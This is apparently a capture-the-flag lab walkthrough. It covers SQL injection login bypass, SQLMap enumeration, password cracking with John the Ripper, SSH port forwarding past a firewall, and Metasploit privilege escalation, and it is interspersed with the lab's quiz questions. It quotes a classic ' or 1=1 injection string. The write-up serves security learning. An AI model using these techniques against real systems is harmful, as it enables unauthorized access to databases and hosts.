Walkthrough of a Linux machine exploitation attacking SQL database, cracking some credentials and gaining root privileges with Metasploit payload.
Deploying the vulnerable machine
What is the name of the large cartoon avatar holding a sniper on the forum?
Obtain access via SQLi
The Nmap scan shows 2 services, SSH and HTTP but not much additional information.
There is an SQL database underneath to abuse via the login page. Our input is put into the SELECT * FROM users WHERE username = :username AND password := password query in the backend. If we put ‘ or 1=1 — – into the user field that authenticates the session as 1=1 is always true, it returns all of the values.
This allows us to bypass the login page.
What page are we get redirected to?
Using SQLMap
First of all we need to intercept a request via this search feature of the site using BurpSuite.
After catching and saving the whole POST request into a text file we could pass it to SQLMap to use our authenticated user session.
In the users table, what is the hashed password?
What was the username associated with the hashed password?
What was the other table name?
Cracking a password with JohnTheRipper
What is the de-hashed password?
What is the user flag?
Exposing services with reverse SSH tunnels
First of all we have to do some internal enumeration dumping the traffic flowing through the sockets with the tool Ss which is basically a replacement for the Netstat command.
Tcp 10000 is open but blocked by a firewall rule as there was no sign of it during the initial Nmap scan. In a situation like this we can circumvent the block with port forwarding. Local SSH tunneling makes it possible to forward the port from a remote machine back to the local machine.
This means that the same Nmap scan now is able to detect the port and service of the machine via 127.0.0.1.
This can also be confirmed in our webbrowser.
What is the name of the exposed CMS?
What is the CMS version?
Privilege Escalation with Metasploit
Looking for potential exploits we have got a couple Metasploit ones.
Two important things to keep in mind with the tunneling, first of all the SSH port forwarding must be alive during the Metasploit exploit and the second thing is a consequence of this namely that the RHOST will be the local machine, not the victim in the lab.
Thanks for reading and as always, any feedback is most welcome.